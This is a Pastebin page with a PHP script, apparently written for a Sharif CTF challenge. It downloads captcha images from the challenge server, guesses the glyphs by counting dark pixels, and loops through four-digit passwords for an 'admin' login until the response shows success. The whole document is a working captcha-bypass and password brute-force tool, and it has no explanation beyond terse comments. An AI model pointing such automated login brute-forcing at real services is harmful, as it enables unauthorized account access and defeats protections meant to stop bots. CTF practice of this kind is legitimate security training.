Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- # Old persian cuneiform captcha
- # Solved by PHP
- # Accuracy near 20%, That is shit, but we have no time
- #
- # xeksec team https://forum.xeksec.com
- date_default_timezone_set('Europe/London');
- header('Content-Type: text/html; charset=utf-8');
- error_reporting(E_ALL);
- set_time_limit(0);
- function ccc($url, $post = null)
- {
- if ($ch = curl_init($url)) {
- if ($post) {
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- }
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla');
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_COOKIEFILE, '1.txt');
- curl_setopt($ch, CURLOPT_COOKIEJAR, '1.txt');
- curl_setopt($ch, CURLOPT_TIMEOUT, 2);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
- $content = curl_exec($ch);
- curl_close($ch);
- return $content;
- }
- }
- $attempt = 1;
- $pass = 0;
- $ff = false;
- do {
- $url = ccc('http://ctf.sharif.edu:32455/chal/oldpersian/ba05b5fdf0057776/captcha/');
- file_put_contents('captcha.jpeg', $url);
- shell_exec('convert captcha.jpeg -crop 16.9%x100% test_%d.png');
- $captcha = getString();
- $post = 'username=admin&password=' . sprintf('%04d',$pass) . '&captcha=' . $captcha;
- if ($cnt = ccc('http://ctf.sharif.edu:32455/chal/oldpersian/ba05b5fdf0057776/login/submit/', $post))
- {
- if (strpos($cnt, 'Invalid captcha') !== false)
- {
- print sprintf('%04d',$pass) . " - " . $captcha . " - " . $attempt . " attempts\n";
- $attempt++;
- }
- else
- if (strpos($cnt, 'Login failed!') !== false)
- {
- print sprintf('%04d', $pass) . " - " . $captcha . " - " . $attempt . " login failed\n";
- $pass++;
- $attempt = 1;
- }
- else
- {
- $ff = true;
- var_dump(sprintf('%04d',$pass));
- var_dump($cnt);
- exit;
- }
- }
- } while ($ff === false);
- $alphabet = [
- 'A' => 678, // 686, 676, 681, 686 ++
- 'B' => 505,// 510, 500, 509, 507 +++
- 'C' => 638, // 641 ++
- 'D' => 512, // ++
- 'E' => 168, // 171, 174, 168, 172 +++
- 'F' => 711, // 707, 705, 704
- 'G' => 702, // +++
- 'H' => 880, //888, 873, 875, 877
- 'I' => 589, // 579, 584 ++
- 'J' => 567, // ++
- 'K' => 508, // 514 ++
- 'L' => 611, // 610, 615 ++
- 'M' => 605, // 607, 604, 608 ++
- ];
- function getString()
- {
- $arr = parseImages();
- $word = [];
- foreach ($arr as $count)
- {
- if ($count < 200)
- {
- $word[] = 'E';
- }
- else
- if ($count >= 490 && $count < 510)
- {
- $word[] = 'B';
- }
- else
- if ($count >= 510 && $count < 525)
- {
- $lol = rand(0,1);
- if ($lol == 0) $word[] = 'D'; else $word[] = 'K';
- }
- else
- if ($count >= 550 && $count < 577)
- {
- $word[] = 'J';
- }
- else
- if ($count >= 577 && $count < 595)
- {
- $word[] = 'I';
- }
- else
- if ($count >= 595 && $count < 610)
- {
- $word[] = 'M';
- }
- else
- if ($count >= 610 && $count < 630)
- {
- $word[] = 'L';
- }
- else
- if ($count >= 630 && $count < 650)
- {
- $word[] = 'C';
- }
- else
- if ($count >= 670 && $count < 690)
- {
- $word[] = 'A';
- }
- else
- if ($count >= 690 && $count < 704)
- {
- $word[] = 'G';
- }
- else
- if ($count >= 704 && $count < 740)
- {
- $word[] = 'F';
- }
- else
- if ($count >= 800)
- {
- $word[] = 'H';
- }
- }
- return implode('', $word);
- }
- function parseAlphabet(){
- for ($i = 'A'; $i <= 'M';$i++)
- {
- $im = imagecreatefrompng($i . '.png');
- $count = imageToMatrix($im, false);
- $s[$i] = $count;
- }
- }
- function parseImages(){
- for ($i = 0; $i < 6;$i++)
- {
- $im = imagecreatefrompng('test_' . $i . '.png');
- $count = imageToMatrix($im, true);
- $s[] = $count;
- }
- return $s;
- }
- function imageToMatrix($im, $rotate = false) {
- $height = imagesy($im);
- $width = imagesx($im);
- if ($rotate) {
- $height = imagesx($im);
- $width = imagesy($im);
- }
- $background = 0;
- $count = 0;
- for ($i = 0; $i < $height; $i++)
- for ($j = 0; $j < $width; $j++) {
- if ($rotate) {
- $rgb = imagecolorat($im, $i, $j);
- } else {
- $rgb = imagecolorat($im, $j, $i);
- }
- list($r, $g, $b) = array_values(imageColorsForIndex($im, $rgb));
- if ($i == 0 && $j == 0) {
- $background = $r;
- }
- //if ($r != $background)
- if ($r < 150)
- {
- $count++;
- }
- }
- return $count;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement